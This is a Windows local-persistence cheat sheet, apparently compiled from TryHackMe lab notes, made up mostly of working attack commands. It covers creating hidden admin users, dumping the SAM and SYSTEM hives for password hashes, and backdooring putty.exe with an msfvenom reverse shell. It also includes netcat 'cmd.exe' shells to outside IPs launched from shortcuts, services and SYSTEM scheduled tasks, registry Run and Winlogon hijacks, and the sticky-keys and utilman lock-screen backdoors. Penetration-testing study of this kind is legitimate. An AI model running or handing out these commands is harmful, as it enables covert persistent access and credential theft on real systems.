Skip to content

Local Persistence

(LP0) - Add new user

Add / Update user

If you are local admin (nt authority\system):

update configuration - open RDP 

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
add new user 
net user hacker hacker /add
NET LOCALGROUP "Administrators" hacker /ADD
NET LOCALGROUP "Remote Desktop Users" hacker /ADD
net user hacker
update local admin password - (not recommended) 
net user administrator hacker

(LP1) - Tampering With Unprivileged Accounts

Assign Group Memberships 1

  • add unprivileged user to "Administrators" group 
    net localgroup administrators thmuser0 /add

Assign Group Memberships 2

  • add unprivileged user to "Backup Operators" group
  • add unprivileged user to "Remote Desktop Users" group
  • enable "Backup Operators" group 
    net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Desktop Users" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
  • connect via evil-winrm
  • dump content of the SAM and SYSTEM registry hives 
    evil-winrm -i 10.10.161.223 -u thmuser1 -p Password321
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
exit
  • get user hashes 
    /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Special Privileges and Security Descriptors

  • assign privileges to user
    • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
    • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.
  • export the current configuration of user perminision 
    secedit /export /cfg config.inf
  • edit file and add user 
    SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
  • We finally convert the .inf file into a .sdb file which is then used to load the configuration back into the system 
    secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
  • You should now have a user with equivalent privileges to any Backup Operator
  • To open the configuration window for WinRM's security descriptor, you can use the following command in Powershell (you'll need to use the GUI session for this):
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

This will open a window where you can add thmuser2 and assign it full privileges to connect to WinRM

RID Hijacking

  • https://tryhackme.com/room/windowslocalpersistence

(LP2) - Backdooring Files

Executable files

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

Shortcut Files

calc-backdoor.ps1 

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe 10.18.9.175 4445"
C:\Windows\System32\calc.exe
Link Target 
powershell.exe -WindowStyle hidden C:\Windows\System32\calc-backdoor.ps1

Hijacking File Associations

  • https://tryhackme.com/room/windowslocalpersistence

(LP3) - Abusing Services

Creating backdoor services

create backdoor service 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-svc.exe
run that service on windows 
sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2

(LP4) - Abusing Scheduled Tasks

Createn new task

create task 

schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.18.9.175 4449" /ru SYSTEM
confirm creation 
schtasks /query /tn thm-taskbackdoor

(LP5) - Logon Triggered Persistence

Startup folder

  • drop backdoor into Startup folder
    • C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 
      msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4450 -f exe -o revshell.exe

Run / RunOnce

  • You can also force a user to execute a program on logon via the registry.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • Let's then create a REG_EXPAND_SZ registry entry under
    • with MyBackdoor name
    • with C:\Windows\backdoor.exe value

Winlogon

Another alternative to automatically start programs on logon is abusing Winlogon, the Windows component that loads your user profile right after authentication (amongst other things).

Winlogon uses some registry keys under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ that could be interesting to gain persistence Edit Userinit record - New value = C:\Windows\system32\userinit.exe, C:\Users\Administrator\Downloads\rev-svc6.exe

Logon scripts

  • crente new record under Computer\HKEY_CURRENT_USER\Environment
  • Let's then create a REG_EXPAND_SZ registry entry under
    • with UserInitMprLogonScript name
    • with C:\Windows\backdoor.exe value

(LP6) - Backdooring the Login Screen / RDP

Sticky Keys

takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
- now, after pressing SHIFT 5 times on lock screen, Windows will execute the binary cmd.exe

Utilman

Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen. 

takeown /f c:\Windows\System32\utilman.exe

icacls C:\Windows\System32\utilman.exe /grant Administrator:F

copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe